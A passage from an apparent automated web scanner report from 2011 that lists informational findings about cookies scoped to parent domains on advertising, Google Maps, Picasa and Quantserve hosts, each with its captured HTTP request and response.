GUID=MTMwNDU1Njk4NDsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Sat, 04-May-2013 00:56:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=aolcom_cs=1&betq=13668=438747 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDUzMTA5NzsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=nubwN5pqEIxFG6povUg3sY4QSKMCItdxihQ3WXsYIoLOGLGCKGexihQ3gZsYIMa4FLGCEGexihAmoZsYIwtlGLGCA9qxihw2kXsYIsijGLGCGenxihQQvasYI0kmGLGC3mpxiVrqFoxsGOUtrWQIza0bRGQBg2cBYam5IasExOSBsRpxv1I9HsfzFr9i4WQBwWIomtCqGgKseWw7RasrVSfBrLqhgOJUFQT2F7KruXQAzZsr0KXBbzqxum6BF8sXG7KogZwrgYANzWtBkoqhCO67GcNNGqbkAfwuRXwoum/BEOphQPLUHsEpGuNq+fQoeZc4fOMCgwhRJU7/IUJtGcmZpTrBfC; F1=Bc6uB3EBAAAABAAAAEAAgEA; BASE=Rgwq3yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9pF!; ROLL=boAno2Cov1BgAaG!

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:56:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=4WfwN5pqEIxFGJpovUg3sY0NSKMCItdhWhQ3WXoVIoLOGaFCKGehWhQ3gZoVIMa4FaFCEGehWhAmoZoVIwtlGaFCA9qhWhw2kXoVIsijGaFCGenhWhQQvaoVI0kmGaFC3mphWVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaoBxOSBsRphj1I9HsfzF68i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAH; domain=advertising.com; expires=Sat, 04-May-2013 00:56:24 GMT; path=/
Set-Cookie: GUID=MTMwNDU1Njk4NDsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Sat, 04-May-2013 00:56:24 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Thu, 05 May 2011 01:56:24 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

16.77. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=916aad4fa2d46b54:TM=1304592793:LM=1304592793:S=ngvj94qxaaorD5lW; expires=Sat, 04-May-2013 10:53:13 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.78. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=4480baab36f5fc64:TM=1304592793:LM=1304592793:S=1c2dl40v_hgXyUwI; expires=Sat, 04-May-2013 10:53:13 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=4480baab36f5fc64:TM=1304592793:LM=1304592793:S=1c2dl40v_hgXyUwI; expires=Sat, 04-May-2013 10:53:13 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

16.79. http://picasaweb.google.com/data/feed/base/user/h02332/albumid/5537331698402427137 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/data/feed/base/user/h02332/albumid/5537331698402427137

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=photos_html=77povLnDncriQMlvMK8fnQ; Domain=.google.com; Path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data/feed/base/user/h02332/albumid/5537331698402427137 HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Thu, 05 May 2011 10:53:27 GMT
Date: Thu, 05 May 2011 10:53:27 GMT
Cache-Control: private, max-age=0, must-revalidate, no-transform
Set-Cookie: _rtok=zhiANk2TsO4s; Path=/; HttpOnly
Set-Cookie: S=photos_html=77povLnDncriQMlvMK8fnQ; Domain=.google.com; Path=/; HttpOnly
Content-Type: application/atom+xml; charset=UTF-8
Vary: Accept, X-GData-Authorization, GData-Version, Cookie
GData-Version: 1.0
Last-Modified: Fri, 01 Apr 2011 15:31:40 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<?xml version='1.0' encoding='UTF-8'?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:gphoto='http://schemas.google.com/photos/2007' xmlns:media='http://search.yahoo.com/mrss/' xmlns:openSearch='http:
...[SNIP]...

16.80. http://picasaweb.google.com/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=photos_html=2Z1FyatXMiLJ8zPEv8c_zA; Domain=.google.com; Path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: Thu, 05 May 2011 10:53:30 GMT
Date: Thu, 05 May 2011 10:53:30 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=exrwsP6mSpIL; Path=/; HttpOnly
Set-Cookie: S=photos_html=2Z1FyatXMiLJ8zPEv8c_zA; Domain=.google.com; Path=/; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?hl=en_US&continue=https%3A%2F%2Fpicasaweb.google.com%2Flh%2Flogin%3Fcontinue%3Dhttps%253A%252F%252Fpicasaweb.google.com%252Fhome&service=lh2&ltmpl=gp&passive=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?h
...[SNIP]...

16.81. http://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=photos_html=vKILXVHQkpet2Ha2vuZN6w; Domain=.google.com; Path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Thu, 05 May 2011 10:53:31 GMT
Date: Thu, 05 May 2011 10:53:31 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=SIFFmD1DIHx0; Path=/; HttpOnly
Set-Cookie: S=photos_html=vKILXVHQkpet2Ha2vuZN6w; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

16.82. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=ECQAGO8kjVmtjIMIufKMgQG2AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGdGCu2CWsYNcdDECEYILsywS0zQjCCAwLhHxjjgv8ZIA6JIA4QC-ILZLEILRiysZSjiyM; expires=Wed, 03-Aug-2011 00:57:27 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1375825468;fpan=1;fpa=P0-1909268260-1304575044578;ns=0;url=http%3A%2F%2Fwww.truveo.com%2F;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304575044577;tzo=300;a=p-69y4MvfNUPaiY HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.truveo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EAcAGO8kjVmtjIMIufKMgQG2AQHVBoHTAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGdGCu2CWsYNcdDECEYILsywS0zQjCCAwLhHxjjgv8ZIA6JIA4QC-ILZLEILRiysZSjiyM

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=ECQAGO8kjVmtjIMIufKMgQG2AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGdGCu2CWsYNcdDECEYILsywS0zQjCCAwLhHxjjgv8ZIA6JIA4QC-ILZLEILRiysZSjiyM; expires=Wed, 03-Aug-2011 00:57:27 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Thu, 05 May 2011 00:57:27 GMT
Server: QS

16.83. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-3aud4J6uA4Z6Y.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EAsAGO8kjVmtjIMIufKMgQG1AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizFILKjTBH-EQQBwSAAADBAGFogD3G7YJaxg1x0MQIRgguzLBLTOBKCAwLhrjD_GSAOiSAOEAviC2SxCC0YsrGUo4sjA; expires=Wed, 03-Aug-2011 01:00:39 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-3aud4J6uA4Z6Y.gif?labels=InvisibleBox&busty=7596 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EC0AGO8kjVmtjIMIufKMgQG1AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGFogD3G7YJaxg1x0MQIRgguzLBLTOBKCAwLhrjD_GSAOiSAOEAviC2SxCC0YsrGUo4sjA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://segment-pixel.invitemedia.com/pixel?pixelID=23864&partnerID=77&clientID=1679&key=segment&pb=0
Set-Cookie: d=EAsAGO8kjVmtjIMIufKMgQG1AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizFILKjTBH-EQQBwSAAADBAGFogD3G7YJaxg1x0MQIRgguzLBLTOBKCAwLhrjD_GSAOiSAOEAviC2SxCC0YsrGUo4sjA; expires=Wed, 03-Aug-2011 01:00:39 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 05 May 2011 01:00:39 GMT
Server: QS

16.84. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-444Ux5EmpXDp6.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EC0AGO8kjVmtjIMIufKMgQG1AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGFogD3G7YJaxg1x0MQIRgguzLBLTOBKCAwLhrjD_GSAOiSAOEAviC2SxCC0YsrGUo4sjA; expires=Wed, 03-Aug-2011 00:59:45 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-444Ux5EmpXDp6.gif?labels=19677.16 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EBYAGO8kjVmtjIMIufKMgQG0AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGFoogRu2CWsYNcdDECEYILsywS0zgSggMC4a4w_xkgDokgDhAL4gtksQgtGLKxlKOLIw

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=1232531&t=2
Set-Cookie: d=EC0AGO8kjVmtjIMIufKMgQG1AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGFogD3G7YJaxg1x0MQIRgguzLBLTOBKCAwLhrjD_GSAOiSAOEAviC2SxCC0YsrGUo4sjA; expires=Wed, 03-Aug-2011 00:59:45 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 05 May 2011 00:59:45 GMT
Server: QS

16.85. http://r1-ads.ace.advertising.com/click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=/GowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
F1=B8bgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
2088728852=_4dc1f5d8,2088728852,743226^894907^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACID=aw960013034229720018; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ; 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_;

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 05 May 2011 10:53:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Set-Cookie: C2=/GowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: F1=B8bgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
Set-Cookie: 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
Set-Cookie: 26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 2088728852=_4dc1f5d8,2088728852,743226^894907^1183^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 10:53:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.86. http://r1-ads.ace.advertising.com/click/site=0000743227/mnum=0000894905/cstr=97154103=_4dc1f637,3024464342,743227^894905^1183^0,1_/xsxdata=1:93310501/bnum=97154103/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000743227/mnum=0000894905/cstr=97154103=_4dc1f637,3024464342,743227^894905^1183^0,1_/xsxdata=1:93310501/bnum=97154103/optn=64

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=AHowN5pqEIxFGTnovUg3sYcGSKMCItdhShQ3WXoUIsY4FKFCw3ghShgu4YoUIoY4FKFCbGehShw7NYoUI0NYGKFCjGehShAhhXoUIgJaGKFCcbphShAQvaoUIYnXGKFC+XhhShw2kXoUIsijGKFCaTehShwtZaoUIE0rGKFCFBqhShQTaaoUI0soGKFCGenhSVrqFoxsGnRtrWQIzaYRRGQBg2cRuZm5IaoixOSBsRpBG1I9IsfzFK1i4WQBwWsdmtCqG5HseWw7RaQhVSfBrLqx2NJUFQT2FUIruXQAzZQh0KXBbzqBFm6BF8sXGUIogZwrgYkCzWtBkoqxYN67GcNNGDZkAfwuRXUeum/BEOpxmOLUHsEpGHLq+fQoeZAufO8BgwhhfX7/IUJtG1jZpTrR1FqFI09IGKVo8iw5qYoUY6ACsMihShAnjaoUIEv9FKlgigQvJVAc; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
F1=BAcgC3kAAAAAmc1CAEAA0AgAAAAA6c1CAEAA0AA; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
ROLL=boAnp2C!; domain=advertising.com; expires=Sat, 04-May-2013 10:53:52 GMT; path=/
24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
35460744=_4dc1f5fa,0551647852,790523^981190^1183^0,0_; domain=advertising.com; path=/click
63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,0_; domain=advertising.com; path=/click
31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
47128691=_4dc1f5f0,4051206027,743206^973503^246^0,0_; domain=advertising.com; path=/click
26673240=_4dc1f5fa,0284425102,790523^1002049^1183^0,0_; domain=advertising.com; path=/click
97154103=_4dc1f637,3024464342,743227^894905^1183^0,0_; domain=advertising.com; path=/click
84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
3024464342=_4dc1f637,3024464342,743227^894905^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000743227/mnum=0000894905/cstr=97154103=_4dc1f637,3024464342,743227^894905^1183^0,1_/xsxdata=1:93310501/bnum=97154103/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
